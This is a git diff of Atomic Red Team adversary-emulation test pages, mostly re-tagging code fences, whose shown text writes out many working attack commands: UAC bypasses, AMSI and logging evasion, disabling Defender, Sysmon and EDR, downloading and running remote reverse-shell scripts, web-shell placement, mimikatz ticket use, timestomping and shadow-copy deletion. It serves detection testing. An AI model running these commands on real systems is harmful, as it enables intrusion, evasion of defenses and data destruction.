javascript:a=GetObject('script:#{url}').Exec();close()" ``` @@ -319,14 +339,16 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen #### Attack Commands: Run with `powershell`! -``` + + +```powershell # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team"" reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART))) ``` #### Cleanup Commands: -``` +```powershell cmd /c del /Q /F %SystemRoot%\Temp\art-marker.txt cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f ``` @@ -346,20 +368,23 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo #### Attack Commands: Run with `powershell`! -``` + + +```powershell powershell.exe -version 2 -Command Write-Host $PSVersion ``` + #### Dependencies: Run with `powershell`! ##### Description: PowerShell version 2 must be installed ##### Check Prereq Commands: -``` +```powershell if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Automated installer not implemented yet, please install PowerShell v2 manually ``` @@ -382,26 +407,29 @@ Creates a file with an alternate data stream and simulates executing that hidden #### Attack Commands: Run with `powershell`! -``` + + +```powershell Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand' $streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand' Invoke-Expression $streamcommand ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{ads_file} -Force -ErrorAction Ignore ``` + #### Dependencies: Run with `powershell`! ##### Description: Homedrive must be an NTFS drive ##### Check Prereq Commands: -``` +```powershell if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell Write-Host Prereq's for this test cannot be met automatically ``` diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md index 470d30e8..fba2d09e 100644 --- a/atomics/T1087/T1087.md +++ b/atomics/T1087/T1087.md @@ -64,7 +64,9 @@ Enumerate all accounts by copying /etc/passwd to another file #### Attack Commands: Run with `sh`! -``` + + +```sh cat /etc/passwd > #{output_file} ``` @@ -89,7 +91,9 @@ cat /etc/passwd > #{output_file} #### Attack Commands: Run with `sh`! -``` + + +```sh cat /etc/sudoers > #{output_file} ``` @@ -114,7 +118,9 @@ View accounts wtih UID 0 #### Attack Commands: Run with `sh`! -``` + + +```sh grep 'x:0:' /etc/passwd > #{output_file} ``` @@ -134,7 +140,9 @@ List opened files by user #### Attack Commands: Run with `sh`! -``` + + +```sh username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ``` @@ -159,7 +167,9 @@ Show if a user account has ever logged in remotely #### Attack Commands: Run with `sh`! -``` + + +```sh lastlog > #{output_file} ``` @@ -179,7 +189,9 @@ Utilize groups and id to enumerate users and groups #### Attack Commands: Run with `sh`! -``` + + +```sh groups id ``` @@ -200,7 +212,9 @@ Utilize local utilities to enumerate users and groups #### Attack Commands: Run with `sh`! -``` + + +```sh dscl . list /Groups dscl . list /Users dscl . list /Users | grep -v '_' @@ -224,7 +238,9 @@ Enumerate all accounts #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net user net user /domain dir c:\Users\ @@ -249,7 +265,9 @@ Enumerate all accounts via PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell net user net user /domain get-localuser @@ -279,7 +297,9 @@ Enumerate logged on users #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd query user ``` @@ -299,7 +319,9 @@ Enumerate logged on users via PowerShell #### Attack Commands: Run with `powershell`! -``` + + +```powershell query user ``` diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md index 60944e84..6e4516c8 100644 --- a/atomics/T1088/T1088.md +++ b/atomics/T1088/T1088.md @@ -40,13 +40,15 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe /c eventvwr.msc ``` #### Cleanup Commands: -``` +```cmd reg.exe delete hkcu\software\classes\mscfile /f ``` @@ -70,14 +72,16 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\eventvwr.msc" ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore ``` @@ -101,14 +105,16 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" fodhelper.exe ``` #### Cleanup Commands: -``` +```cmd reg.exe delete hkcu\software\classes\ms-settings /f ``` @@ -132,7 +138,9 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force @@ -140,7 +148,7 @@ Start-Process "C:\Windows\System32\fodhelper.exe" ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` @@ -164,7 +172,9 @@ PowerShell code to bypass User Account Control using ComputerDefaults.exe on Win #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force @@ -172,7 +182,7 @@ Start-Process "C:\Windows\System32\ComputerDefaults.exe" ``` #### Cleanup Commands: -``` +```powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore ``` @@ -196,14 +206,16 @@ Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC by #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd mkdir "\\?\C:\Windows \System32\" copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe" mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe" ``` #### Cleanup Commands: -``` +```cmd rd "\\?\C:\Windows \" /S /Q del "c:\testbypass.exe" >nul 2>nul ``` diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md index 54708cfd..3908f7b3 100644 --- a/atomics/T1089/T1089.md +++ b/atomics/T1089/T1089.md @@ -55,7 +55,9 @@ Disables the iptables firewall #### Attack Commands: Run with `sh`! -``` + + +```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service iptables stop @@ -84,7 +86,9 @@ Disables syslog collection #### Attack Commands: Run with `sh`! -``` + + +```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service rsyslog stop @@ -111,7 +115,9 @@ Disable the Cb Response service #### Attack Commands: Run with `sh`! -``` + + +```sh if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service cbdaemon stop @@ -138,7 +144,9 @@ Disables SELinux enforcement #### Attack Commands: Run with `sh`! -``` + + +```sh setenforce 0 ``` @@ -158,7 +166,9 @@ Disables Carbon Black Response #### Attack Commands: Run with `sh`! -``` + + +```sh sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist ``` @@ -178,7 +188,9 @@ Disables LittleSnitch #### Attack Commands: Run with `sh`! -``` + + +```sh sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist ``` @@ -198,7 +210,9 @@ Disables OpenDNS Umbrella #### Attack Commands: Run with `sh`! -``` + + +```sh sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ``` @@ -223,26 +237,29 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd fltmc.exe unload #{sysmon_driver} ``` #### Cleanup Commands: -``` +```cmd sc stop sysmon fltmc.exe load #{sysmon_driver} sc start sysmon ``` + #### Dependencies: Run with `command_prompt`! ##### Description: Sysmon filter must be loaded ##### Check Prereq Commands: -``` +```cmd fltmc.exe filters | findstr #{sysmon_driver} ``` ##### Get Prereq Commands: -``` +```cmd echo Automated installer not implemented yet, please install Sysmon manually ``` @@ -266,12 +283,14 @@ This action requires HTTP logging configurations in IIS to be unlocked. #### Attack Commands: Run with `powershell`! -``` + + +```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true ``` #### Cleanup Commands: -``` +```powershell C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false ``` @@ -295,24 +314,27 @@ Uninstall Sysinternals Sysmon for Defense Evasion #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sysmon -u ``` #### Cleanup Commands: -``` +```cmd sysmon -i -accepteula ``` + #### Dependencies: Run with `powershell`! ##### Description: Sysmon executable must be available ##### Check Prereq Commands: -``` +```powershell if(cmd /c where sysmon) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath" @@ -321,11 +343,11 @@ if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} ``` ##### Description: Sysmon must be installed ##### Check Prereq Commands: -``` +```powershell if(cmd /c sc query sysmon) { exit 0} else { exit 1} ``` ##### Get Prereq Commands: -``` +```powershell cmd /c sysmon -i -accepteula ``` @@ -344,12 +366,14 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ #### Attack Commands: Run with `powershell`! -``` + + +```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` #### Cleanup Commands: -``` +```powershell [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false) ``` @@ -369,12 +393,14 @@ This test removes the Windows Defender provider registry key. #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse ``` #### Cleanup Commands: -``` +```powershell New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" ``` @@ -398,13 +424,15 @@ With administrative rights, an adversary can disable Windows Services related to #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd net.exe stop #{service_name} sc.exe config #{service_name} start= disabled ``` #### Cleanup Commands: -``` +```cmd sc.exe config #{service_name} start= auto net.exe start #{service_name} ``` @@ -426,7 +454,9 @@ Credit to Matt Graeber (@mattifestation) for the research. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 @@ -434,7 +464,7 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] ``` #### Cleanup Commands: -``` +```powershell $GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static') $GroupPolicySettings = $GroupPolicySettingsField.GetValue($null) $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1 @@ -458,7 +488,9 @@ Credit to Matt Graeber (@mattifestation) for the research. #### Attack Commands: Run with `powershell`! -``` + + +```powershell [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` @@ -478,7 +510,9 @@ Attempting to disable scheduled scanning and other parts of windows defender atp #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Set-MpPreference -DisableRealtimeMonitoring 1 Set-MpPreference -DisableBehaviorMonitoring 1 Set-MpPreference -DisableScriptScanning 1 @@ -486,7 +520,7 @@ Set-MpPreference -DisableBlockAtFirstSeen 1 ``` #### Cleanup Commands: -``` +```powershell Set-MpPreference -DisableRealtimeMonitoring 0 Set-MpPreference -DisableBehaviorMonitoring 0 Set-MpPreference -DisableScriptScanning 0 @@ -508,14 +542,16 @@ Attempting to disable scheduled scanning and other parts of windows defender atp #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd sc stop WinDefend sc config WinDefend start=disabled sc query WinDefend ``` #### Cleanup Commands: -``` +```cmd sc start WinDefend sc config WinDefend start=enabled ``` @@ -535,12 +571,14 @@ Disable Windows Defender from starting after a reboot #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 ``` #### Cleanup Commands: -``` +```powershell Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 ``` @@ -560,7 +598,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state- #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel" New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" @@ -571,7 +611,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" ``` @@ -593,7 +633,9 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state- #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md index 4f4e0c25..ed7d485b 100644 --- a/atomics/T1090/T1090.md +++ b/atomics/T1090/T1090.md @@ -31,12 +31,14 @@ Note that this test may conflict with pre-existing system configuration. #### Attack Commands: Run with `sh`! -``` + + +```sh export #{proxy_scheme}_proxy=#{proxy_server} ``` #### Cleanup Commands: -``` +```sh unset http_proxy unset https_proxy ``` @@ -64,12 +66,14 @@ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress} ``` #### Cleanup Commands: -``` +```powershell netsh interface portproxy delete v4tov4 listenport=#{listenport} ``` diff --git a/atomics/T1093/T1093.md b/atomics/T1093/T1093.md index ebec4674..53a90c03 100644 --- a/atomics/T1093/T1093.md +++ b/atomics/T1093/T1093.md @@ -26,14 +26,16 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/ #### Attack Commands: Run with `powershell`! -``` + + +```powershell . $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1 $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose ``` #### Cleanup Commands: -``` +```powershell Stop-Process -Name "#{spawnto_process_name}" ``` diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index f8a02dce..e45be7d2 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -29,7 +29,9 @@ refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-ic #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1') Invoke-PowerShellIcmp -IPAddress #{server_ip} ``` @@ -60,20 +62,23 @@ nc -l -p #### Attack Commands: Run with `powershell`! -``` + + +```powershell cmd /c #{ncat_exe} #{server_ip} #{server_port} ``` + #### Dependencies: Run with `powerShell`! ##### Description: ncat.exe must be available at specified location (#{ncat_exe}) ##### Check Prereq Commands: -``` +```powerShell if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powerShell New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null $parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath" @@ -106,7 +111,9 @@ nc -l -p #### Attack Commands: Run with `powershell`! -``` + + +```powershell IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/ff755efeb2abc3f02fa0640cd01b87c4a59d6bb5/powercat.ps1') powercat -c #{server_ip} -p #{server_port} ``` diff --git a/atomics/T1096/T1096.md b/atomics/T1096/T1096.md index 42dceb15..61867a50 100644 --- a/atomics/T1096/T1096.md +++ b/atomics/T1096/T1096.md @@ -30,7 +30,9 @@ Execute from Alternate Streams #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe @@ -66,7 +68,9 @@ Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. #### Attack Commands: Run with `powershell`! -``` + + +```powershell if (!(Test-Path C:\Users\Public\Libraries\yanki -PathType Container)) { New-Item -ItemType Directory -Force -Path C:\Users\Public\Libraries\yanki } @@ -74,7 +78,7 @@ Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>, ``` #### Cleanup Commands: -``` +```powershell Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore ``` diff --git a/atomics/T1097/T1097.md b/atomics/T1097/T1097.md index 26d98bb9..13c7483c 100644 --- a/atomics/T1097/T1097.md +++ b/atomics/T1097/T1097.md @@ -29,7 +29,9 @@ Similar to PTH, but attacking Kerberos #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mimikatz # kerberos::ptt #{user_name}@#{domain} ``` diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index f9917fa6..46bbb302 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -29,7 +29,9 @@ Manipulate Admin Account Name #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $x = Get-Random -Minimum 2 -Maximum 9999 $y = Get-Random -Minimum 2 -Maximum 9999 $z = Get-Random -Minimum 2 -Maximum 9999 diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md index 63bfc6d2..3225baf2 100644 --- a/atomics/T1099/T1099.md +++ b/atomics/T1099/T1099.md @@ -34,7 +34,9 @@ Stomps on the access timestamp of a file #### Attack Commands: Run with `sh`! -``` + + +```sh touch -a -t 197001010000.00 #{target_filename} ``` @@ -59,7 +61,9 @@ Stomps on the modification timestamp of a file #### Attack Commands: Run with `sh`! -``` + + +```sh touch -m -t 197001010000.00 #{target_filename} ``` @@ -87,7 +91,9 @@ Sudo or root privileges are required to change date. Use with caution. #### Attack Commands: Run with `sh`! -``` + + +```sh NOW=$(date) date -s "1970-01-01 00:00:00" touch #{target_filename} @@ -119,7 +125,9 @@ This technique was used by the threat actor Rocke during the compromise of Linux #### Attack Commands: Run with `sh`! -``` + + +```sh touch -acmr #{reference_file_path} {target_file_path} ``` @@ -147,7 +155,9 @@ This technique was seen in use by the Stitch RAT. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} } ``` @@ -175,7 +185,9 @@ This technique was seen in use by the Stitch RAT. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} } ``` @@ -203,7 +215,9 @@ This technique was seen in use by the Stitch RAT. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} } ``` diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md index 0d8eac36..50e363a6 100644 --- a/atomics/T1100/T1100.md +++ b/atomics/T1100/T1100.md @@ -27,24 +27,27 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/ #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd xcopy #{web_shells} #{web_shell_path} ``` #### Cleanup Commands: -``` +```cmd del #{web_shell_path} >nul 2>&1 ``` + #### Dependencies: Run with `powershell`! ##### Description: Web shell must exist on disk at specified location (#{web_shells}) ##### Check Prereq Commands: -``` +```powershell if (Test-Path #{web_shells}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: -``` +```powershell New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" diff --git a/atomics/T1101/T1101.md b/atomics/T1101/T1101.md index 69bee7c9..6373d0bc 100644 --- a/atomics/T1101/T1101.md +++ b/atomics/T1101/T1101.md @@ -22,7 +22,9 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell # run these in sequence $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' $SecurityPackagesUpdated = $SecurityPackages diff --git a/atomics/T1102/T1102.md b/atomics/T1102/T1102.md index 889559e3..703ef59a 100644 --- a/atomics/T1102/T1102.md +++ b/atomics/T1102/T1102.md @@ -25,12 +25,14 @@ Download data from a public website using command line #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html ``` #### Cleanup Commands: -``` +```cmd del %TEMP%\bitsadmindownload.html >nul 2>&1 ``` @@ -49,7 +51,9 @@ Multiple download methods for files using powershell #### Attack Commands: Run with `powershell`! -``` + + +```powershell Invoke-WebRequest -Uri www.twitter.com $T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/") $wc = New-Object System.Net.WebClient @@ -57,7 +61,7 @@ $T1102 = $wc.DownloadString("https://www.aol.com/") ``` #### Cleanup Commands: -``` +```powershell Clear-Variable T1102 >$null 2>&1 ``` diff --git a/atomics/T1103/T1103.md b/atomics/T1103/T1103.md index 8f4cbcae..a6fa26b7 100644 --- a/atomics/T1103/T1103.md +++ b/atomics/T1103/T1103.md @@ -24,7 +24,9 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg.exe import #{registry_file} ``` diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 3ba539ac..a6343770 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -47,7 +47,9 @@ Utilize rsync to perform a remote file copy (push) #### Attack Commands: Run with `bash`! -``` + + +```bash rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} ``` @@ -75,7 +77,9 @@ Utilize rsync to perform a remote file copy (pull) #### Attack Commands: Run with `bash`! -``` + + +```bash rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} ``` @@ -103,7 +107,9 @@ Utilize scp to perform a remote file copy (push) #### Attack Commands: Run with `bash`! -``` + + +```bash scp #{local_file} #{username}@#{remote_host}:#{remote_path} ``` @@ -131,7 +137,9 @@ Utilize scp to perform a remote file copy (pull) #### Attack Commands: Run with `bash`! -``` + + +```bash scp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` @@ -159,7 +167,9 @@ Utilize sftp to perform a remote file copy (push) #### Attack Commands: Run with `bash`! -``` + + +```bash sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' ``` @@ -187,7 +197,9 @@ Utilize sftp to perform a remote file copy (pull) #### Attack Commands: Run with `bash`! -``` + + +```bash sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` @@ -213,7 +225,9 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} ``` @@ -239,7 +253,9 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify #### Attack Commands: Run with `powershell`! -``` + + +```powershell $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" New-Item -Path $datePath -ItemType Directory Set-Location $datePath @@ -271,7 +287,9 @@ This technique is used by Qbot malware to download payloads. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} ``` @@ -298,12 +316,14 @@ This technique is used by multiple adversaries and malware families. #### Attack Commands: Run with `powershell`! -``` + + +```powershell (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{destination_path} -Force -ErrorAction Ignore ``` @@ -327,7 +347,9 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md index fb4a7a26..780dada7 100644 --- a/atomics/T1107/T1107.md +++ b/atomics/T1107/T1107.md @@ -50,7 +50,9 @@ Delete a single file from the temporary directory #### Attack Commands: Run with `sh`! -``` + + +```sh rm -f #{file_to_delete} ``` @@ -75,7 +77,9 @@ Recursively delete the temporary directory and all files contained within it #### Attack Commands: Run with `sh`! -``` + + +```sh rm -rf #{folder_to_delete} ``` @@ -100,7 +104,9 @@ Use the `shred` command to overwrite the temporary file and then delete it #### Attack Commands: Run with `sh`! -``` + + +```sh shred -u #{file_to_shred} ``` @@ -120,7 +126,9 @@ Delete a single file from the temporary directory using cmd.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo "T1107" > %temp%\T1107.txt del /f %temp%\T1107.txt >nul 2>&1 ``` @@ -141,7 +149,9 @@ Recursively delete the temporary directory and all files contained within it usi #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mkdir %temp%\T1107 rmdir /s /q %temp%\T1107 ``` @@ -162,7 +172,9 @@ Delete a single file from the temporary directory using Powershell #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item $env:TEMP\T1107.txt Remove-Item -path $env:TEMP\T1107.txt ``` @@ -188,7 +200,9 @@ Recursively delete the temporary directory and all files contained within it usi #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item $env:TEMP\T1107 -ItemType Directory Remove-Item -path $env:TEMP\T1107 -recurse ``` @@ -209,7 +223,9 @@ Delete all volume shadow copies with vssadmin.exe #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd vssadmin.exe Delete Shadows /All /Quiet ``` @@ -229,7 +245,9 @@ Delete all volume shadow copies with wmic #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wmic shadowcopy delete ``` @@ -249,7 +267,9 @@ This test leverages `bcdedit` to remove boot-time recovery measures. #### 